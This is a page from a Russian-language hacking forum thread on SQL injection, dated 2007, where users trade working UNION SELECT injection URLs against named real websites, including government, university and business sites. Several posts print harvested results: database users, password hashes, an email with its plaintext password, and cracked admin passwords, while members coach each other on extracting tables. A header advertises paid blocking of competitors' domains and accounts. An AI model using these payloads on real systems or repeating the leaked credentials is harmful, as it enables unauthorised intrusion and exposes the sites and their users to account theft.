Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 237 из 1242

237

Опции темы

Поиск в этой теме

Опции просмотра

#2361

31.05.2007, 17:54

v1ru$

Постоянный

Регистрация: 17.03.2007

Сообщений: 336

Провел на форуме:
3766085

Репутация: 576

Отправить сообщение для v1ru$ с помощью ICQ

Цитата:

Сообщение от Серенький

psyplanet.ru

ничего, что не в личку?
есть таблица user (user_name,user_pass)

с админскими записями, админка тут:

http://www.psyplanet.ru/admin/
Tester
1111

#2362

31.05.2007, 17:57

Ky3bMu4

Постоянный

Регистрация: 03.02.2007

Сообщений: 520

Провел на форуме:
1777536

Репутация: 932

Отправить сообщение для Ky3bMu4 с помощью ICQ

Код:

http://www.biosmagazine.co.uk/press-release.php?id=-8570+union+select+1,2,3,4,user(),version(),7,8,9,10,11,12,13,14,15,16/*
http://www.lincstrust.org.uk/news/press-release.php?article=-87+union+select+1,2,user(),version(),5,6,7/*
http://www.stargallery.co.uk/dmx-release.php?release=-36+union+select+user(),2,version()/*
http://www.alt.ac.uk/news_detail.php?nid=-113+union+select+1,version(),3,user(),5,6/*

#2363

31.05.2007, 18:07

geezer.code

Reservists Of Antichat - Level 6

Регистрация: 22.01.2007

Сообщений: 616

Провел на форуме:
7452489

Репутация: 1359

эту раскрутить не смог

Код:

http://www.mvd.uz/index.php?action=news&nid=&nwid=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12&type=1

А вот тут, логиница в админку можно, только с определенных ip адресов, адреса все лежат в iis ((

Код:

http://www.tfi.uz/?page=news&info=full&idCode=164'+union+select+top+1+1,username+from+users--

#2364

31.05.2007, 19:37

gibson

Moderator - Level 7

Регистрация: 24.02.2006

Сообщений: 447

Провел на форуме:
2872049

Репутация: 705

Отправить сообщение для gibson с помощью ICQ

Цитата:

Сообщение от geezer.code

эту раскрутить не смог

Код:

http://www.mvd.uz/index.php?action=news&nid=&nwid=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12&type=1

епть ты хоть сморишь куда лезешь

Код:

http://www.dsk1ko.ru/dsk1ko/pricelist/ApartmentList/default.aspx?ID=-1+unon+select+1,version(),3,4/*

#2365

31.05.2007, 19:45

Ky3bMu4

Постоянный

Регистрация: 03.02.2007

Сообщений: 520

Провел на форуме:
1777536

Репутация: 932

http://www.y12.doe.gov/

Код:

http://www.y12.doe.gov/news/release.php?id=-38+union+select+1,user(),3,4,version(),6,password,8,9,10+from+mysql.user/*

User: y12admin
Password:*B239D061C8CD910D991D58C252274C9DABA049B9 (чё это за хеш? SHA?)
http://www.smoothwall.ltd.uk/

Код:

http://www.smoothwall.ltd.uk/support/knowledge/view.php?id=-42+union+select+1,user(),version(),4,5,6,7,8,9,10,11,12,13,14,15,16/*

#2366

31.05.2007, 19:46

geezer.code

Reservists Of Antichat - Level 6

Регистрация: 22.01.2007

Сообщений: 616

Провел на форуме:
7452489

Репутация: 1359

Цитата:

Сообщение от gibson

епть ты хоть сморишь куда лезешь

а что , я ничего, вообще ничего не сделал ))

Код:

http://www.groundhigh.com/cpCommerce/category.php?id_category=-1+union+select+1,concat(email,0x3a,pass),3,4+from+cpAccounts+where+level=3/*

info@groundhigh.com:make1ts0

Последний раз редактировалось geezer.code; 31.05.2007 в 19:49..

#2367

31.05.2007, 23:09

KPOT_f!nd

Познавший АНТИЧАТ

Регистрация: 25.08.2006

Сообщений: 1,524

Провел на форуме:
3405508

Репутация: 1745

Код:

http://www.dukemednews.com/news/article.php?id=-9979+union+select+user,2,3,4,5,password,7,8+from+mysql.user/*

root:623460e26f081bbc + еще имееться усеры

Код:

http://www.dcresource.com/news/newsitem.php?id=-3436+union+select+1,2,user(),database(),5,6,7,8,9/*

Ky3bMu4 http://www.y12.doe.gov/ уже есть...

#2368

31.05.2007, 23:45

Пчел

Новичок

Регистрация: 17.05.2007

Сообщений: 13

Провел на форуме:
2036698

Репутация: 20

ООО «Столовое серебро»

Код:

http://www.rusilver.ru/?p=catalog&action=show&id=-12345+union+select+1,2,3,4,5,6/*

USER: silverspoons@localhost
DATABASE: silverspoons
VERSION: 4.1.7

Не знаю как узнать имена таблиц

#2369

01.06.2007, 02:49

geezer.code

Reservists Of Antichat - Level 6

Регистрация: 22.01.2007

Сообщений: 616

Провел на форуме:
7452489

Репутация: 1359

Цитата:

Сообщение от Пчел

ООО «Столовое серебро»

Код:

http://www.rusilver.ru/?p=catalog&action=show&id=-12345+union+select+1,2,3,4,5,6/*

USER: silverspoons@localhost
DATABASE: silverspoons
VERSION: 4.1.7

Не знаю как узнать имена таблиц

Код:

http://www.rusilver.ru/?p=catalog&action=show&id=-12345+union+select+1,2,3,4,concat(name,0x3a,pass),6+from+users/*

boa:b5ecf32b4295a600b9f49f290aa3d55e
boauser:526840b891f4b4fb0dc7ce8a5fb98426
юрик:159ca38bb232c9433f3fe892fc1578da

итд, там таких много )), щас попробуем хэши пробить.

ps вот boa:boass
pps админ по ходу юрик:yurik

Последний раз редактировалось geezer.code; 01.06.2007 в 03:06..

#2370

01.06.2007, 03:21

geezer.code

Reservists Of Antichat - Level 6

Регистрация: 22.01.2007

Сообщений: 616

Провел на форуме:
7452489

Репутация: 1359

Код:

http://www.uyghurinfo.net/index.php?cc=6&sc=0+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6/*

подбирать таблицы лень

Страница 237 из 1242

237

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход